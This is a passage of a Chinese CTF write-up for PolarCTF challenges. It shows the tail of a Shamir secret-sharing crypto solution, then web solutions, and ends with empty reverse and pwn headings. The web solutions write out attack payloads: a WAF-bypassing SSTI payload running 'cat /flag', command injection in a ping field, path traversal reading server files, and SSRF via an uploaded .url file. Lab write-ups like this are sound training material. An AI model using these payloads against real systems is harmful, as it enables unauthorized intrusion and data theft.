if g != 1: raise Exception("模逆不存在") return x % m def lagrange_interpolation(shares, p): """用 k 个点恢复常数项（秘密）""" k = len(shares) secret = 0 for i in range(k): xi, yi = sharesi term = yi for j in range(k): if i != j: xj = sharesj0 num = (0 - xj) % p den = (xi - xj) % p term = (term * num * mod_inverse(den, p)) % p secret = (secret + term) % p return secret # 使用前 5 个分片恢复秘密（任意 5 个都行） selected_shares = shares:5 secret_int = lagrange_interpolation(selected_shares, p) # 转为 bytes 得到 flag flag = long_to_bytes(secret_int) print("恢复的 flag:", flag.decode(errors='ignore')) print("秘密整数:", secret_int) 最后得到flag：flag{shamir_p_recovery_test} |

第三部分：WEB

3-1 偷吃蟠桃

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 看图片 直接控制台输入 score = 30; endLevel(); // 强制触发通关 发现进入第二关 然后他的要求是目标分数是100万分，正常玩不可能达到。 在浏览器控制台中直接触发通关请求即可获得flag。 score = 1000000; currentLevel = 1; endLevel(); 得到flag：flag{wukong_catch_peach_business_logic_bypass} |

3-2 uploadfile

|--------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 上传一个图片码 他说你是php就算你上传成功也有问题 重新思考一下 test3.jpg（内容 <?php echo 1; ?>）上传时被 Connection was reset 拦截了 ❌ 这说明：服务器对文件内容有检测，检测到 <?php 就会直接断开连接，无论后缀是什么。 |

3-3 身份检验系统

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 身份权限校验系统 当前权限：普通用户 提示：参数中不能出现 admin 关键字 考察CTF 变量覆盖挑战 http://132cdec4-1146-4aad-a6c2-c1c097aa9d2f.game.polarctf.com:8090/?is_admin=1 flag{8271ea578adae32da86873d13e473407} 同时http://132cdec4-1146-4aad-a6c2-c1c097aa9d2f.game.polarctf.com:8090/??role=user&is_admin=1这个也可以 |

3-4 狗黑子的股市之路

|--------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： http://409cf915-85cd-457b-87a3-1175288a124d.game.polarctf.com:8090/flag.php 抓包修改成yes 得到flag：flag{a1cfb8cc1fca697b47f989b34e59b372} |

3-5 BH

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 内容如下 系统执行命令： ping -c 2 127.0.0.1 PING 127.0.0.1 (127.0.0.1): 56 字节数据 来自 127.0.0.1 的 64 字节：序列号=0，生存时间=42，时间=0.033 毫秒 来自 127.0.0.1 的 64 字节：序列号=1，生存时间=42，时间=0.041 毫秒 --- 127.0.0.1 ping 统计信息 --- 已发送 2 个数据包，已接收 2 个数据包，丢包率为 0%。 往返时间最小值/平均值/最大值 = 0.033/0.037/0.041 毫秒 <?php error_reporting(0); echo "==== It's another order execution. ====<br>"; echo "Carefully look at the purpose of the code before executing any code<br><br>"; input = _GET'cmd'; command = "ping -c 2 127.0.0.1" . input; echo "System executing command：<br>command\\"; echo "\"; passthru(command); echo "</pre>"; highlight_file(FILE); ?> 利用管道符把cmd命令分开 在这环境这里得到一个假的flag CLI 执行才出真 flag 必须用 php flag.php 命令行执行才能输出真实 flag 得到最后得flag：flag{030e77f73a4cb26a111daf0470c3956f} |

3-6 dairy

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 主页进去发现写日记 输入{{7*7}}得到49应该就是一个ssti模板注入 {{config}} Malicious input detected! Blocked by WAF. {{self.init.globals.builtins.import('os').popen('cat /flag').read()}} Malicious input detected! Blocked by WAF. 不断尝试怎么才能绕过这个waf 直接一个字符不要了 url_for.globals.get('os').popen('cat /flag').read() {{url_for|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')|attr('\x67\x65\x74')('\x6f\x73')|attr('\x70\x6f\x70\x65\x6e')('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')|attr('\x72\x65\x61\x64')()}} |

3-7 你会渗透吗

|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 输入test/test看看内容 社会工程学字典生成器 /tools/tools.zip 权限不足，无法直接访问 这里提示了要提升权限到admin这种高权限 然后dir去扫一下 dirsearch扫描完成了，发现了几个关键信息： 重要发现： 1. 关键路径： /api.php -> 302跳转到 /index.php （已知道） /admin.php -> 302跳转到 /index.php /assets/ -> 301重定向，403禁止访问= /tools/ -> 301重定向，403禁止访问 （之前主页看到的工具目录） 然后继续其他方式 这个图片的地址 http://3a447e39-5b05-42c4-853f-9fb6c76da251.game.polarctf.com:8090/api.php?action=download\&file=picture/第一次相遇.png 主页发现下载接口：api.php?action=download&file=... - 该接口存在任意文件下载 / 路径遍历，可读取源码。 Web 根目录通常是：/var/www/html/（Linux 默认） 不断往上层读取直读取 ../../../../var/www/html/api.php 后，看到源码里直接写了漏洞说明和功能： - download 存在路径遍历 - reset_password 有 CSRF - send_message / check_messages 是消息功能 - 再读取 ../../../../var/www/html/admin.php，页面里直接包含 flag。 关键请求思路： /api.php?action=download&file=../../../../var/www/html/admin.php 得到flag:flag{4323ce6fff96d58cfd37f18747e28c18} |

3- 8 路飞的HTTP协议冒险

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 这里应该是改数成800就可以到下一关 直接到了下一关 根据参数 进入下一关 得到罗宾得提示 第三档 弗兰奇：路飞,男人就该用点"特别的方式"沟通！比如带上值为 BoneInflate的请求头X-Luffy-Gear3. 直接使用curl -b cookie.txt -H "X-Luffy-Gear3: BoneInflate" "http://91eca41c-6fa0-465d-9baa-237c5080ec21.game.polarctf.com:8090/gear3.php" 成功触发了三档系统，两个条件都满足了： ✅ 通信协议：已检测到（X-Luffy-Gear3: BoneInflate 头生效了） ✅ 骨骼膨胀指令：执行成功 但 Flag 还没有直接显示，可能还需要最后一步。 继续进行 雷利：路飞,修行的证明，往往留在浏览器里。你需要gear4和Trainer的认证,记住，我是海贼王罗杰的副手Rayleigh，期待着你化身BoundMan的模样 - Cookie: Trainer=Rayleigh 可以让导师认证通过 - Cookie: gear4=BoundMan 可以让形态状态通过 - 必须连同有效 PHPSESSID 一起带上 curl -b cookie.txt -b "gear4=BoundMan; Trainer=Rayleigh" "http://3cacf02d-e48a-4d0b-8ae4-363eda972868.game.polarctf.com:8090/gear4.php" 之后访问： - /clear_seal.php 会发现： 甚平：路飞,清除之前，先确认它仍是当前状态。否则，这道封印不会接受你的请求。 - Allow: GET, DELETE - 直接 DELETE 会报 428 Precondition Required - Hint 说要"先确认它仍是当前状态" - 响应里还给了： curl -v -X DELETE -b "gear4=BoundMan; Trainer=Rayleigh" "http://3cacf02d-e48a-4d0b-8ae4-363eda972868.game.polarctf.com:8090/clear_seal.php" 2>&1 | findstr ETag 响应中会返回： ETag: "seal-memory-v1" - Etag: "seal-memory-v1" 所以最终正确方式是： - 带上有效 session - 带上 gear4=BoundMan; Trainer=Rayleigh - 对 /clear_seal.php 发： - DELETE - If-Match: "seal-memory-v1" 这样会提示跳转到： - 0nep1ecef1@g.php 最后访问这个页面得到 flag。 flag{15b606dc5a9492c260984aa627338bfd} |

3- 9 TOP10大考察

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 页面有登录注册猜测可能和下面三个方面有关然后根据web10大漏洞考察，开始注册和登录一下 注册之后看到 上面这几个挨着测试呗看看哪个能有用 发现有笔记啥的感觉和以前做的ssrf很像 然后去看看是否能直接内网访问 http://9ee157e6-9599-4c03-9ffb-e32fa989abae.game.polarctf.com:8090/api.php?action=getFlag 得到{"error":"Access denied - Internal API only"} 这说明这个API只允许本地访问（127.0.0.1），外部无法直接调用。 创建.url文件让他自己进行访问我的地址从而实现ssrf 在文件中写入以下内容： ini InternetShortcut URL=http://127.0.0.1/api.php?action=getFlag 上传这个文件之后利用文件分享 因为他的文件分享是可以直接触发ssrf的 我自己上传的是uploads/1.url 最后得到flag{SSRF_WAF_Byp4ss_Curl_Url_2026Summer} 总结：上传.url文件 → 服务端解析URL → 请求内网API → 获取Flag |

3- 10 Polar_校园图库

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 文件内容 <?php class Helper { public type; public cmd; function __destruct() { if (this-\>type === 'eval') { eval(this->cmd); } } } ?><!DOCTYPE html> <html> <head><title>Polar 校园图库</title></head> <body> <h1>Polar 校园图库</h1> <p><a href="upload.php">上传图片</a> | <a href="view.php?file=uploads/demo.php">查看示例</a></p> </body> </html><?php if (_SERVER\['REQUEST_METHOD'\] === 'POST') { if (!isset(_FILES'image')) { die('未选择文件'); } file = _FILES'image'; allowed_types = \['image/gif', 'image/jpeg', 'image/png'\]; if (!in_array(file'type', allowed_types)) { die('不允许的文件类型'); } header = file_get_contents(file\['tmp_name'\], false, null, 0, 4); gif = "\x47\x49\x46\x38"; png = "\\x89\\x50\\x4E\\x47"; jpg1 = "\xFF\xD8\xFF\xE0"; jpg2 = "\\xFF\\xD8\\xFF\\xE1"; if (header !== gif \&\& header !== png \&\& header !== jpg1 \&\& header !== jpg2) { die('非法的图片文件头'); } ext = strtolower(pathinfo(file\['name'\], PATHINFO_EXTENSION)); if (!in_array(ext, 'gif', 'jpg', 'jpeg', 'png')) { die('不允许的扩展名'); } new_name = md5(uniqid(rand(), true)) . '.' . ext; upload_dir = 'uploads/'; if (!move_uploaded_file(file'tmp_name', upload_dir . new_name)) { die('上传失败'); } echo '上传成功，文件名：' . new_name; exit; } ?\> \ \ \\上传图片\\ \ \上传你的校园风景\ \

\ \上传\ \ \\返回首页\\ \ \\_GET'file')) { die('缺少 file 参数'); } file = _GET'file'; if (substr($file, -4) !== '.phpPolar_校园图库 上传图片码和php时候 此时就有限制了 然后一直尝试 |

3- 11 Escape, escape!

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 进去页面如下 信息收集一下 快速检查 curl 'http://127.0.0.1:8000/echo?msg=ops-check' 若返回回显内容，说明入口链路仍可服务旧版脚本。更多对外说明见 /source。 有问题应该出现在旧版本 然后还有任务的一个优先级历史渲染预览任务偶发返回空白页 P2 待分析 Platform Reliability 那么重点就在这上面 |

3- 12 七人组档案

|---------|
| 本题思路如下： |

第四部分：REVERSE

4 -1 顺序输入

|---------|
| 本题思路如下： |

4-2 找寻真我

|---------|
| 本题思路如下： |

4-3 指令整容计划

|---------|
| 本题思路如下： |

4-4 开学美梦

|---------|
| 本题思路如下： |

4-5 入口在哪

|---------|
| 本题思路如下： |

4 -6 练习5

|---------|
| 本题思路如下： |

第五部分：PWN

5 -1 b_double_canary

|---------|
| 本题思路如下： |

5-2 ff_shellcode

|---------|
| 本题思路如下： |

5-3 UAF_fastbin

|---------|
| 本题思路如下： |

5-4 migration

|---------|
| 本题思路如下： |

5-5 loop

|---------|
| 本题思路如下： |

5-6 fnnt

|---------|
| 本题思路如下： |

5-7 off_by_null_unlink

|---------|
| 本题思路如下： |

5-8 heap_mirage

|---------|
| 本题思路如下： |

5-9 one_byte_escape

|---------|
| 本题思路如下： |

5-10 jmp_stack

|---------|
| 本题思路如下： |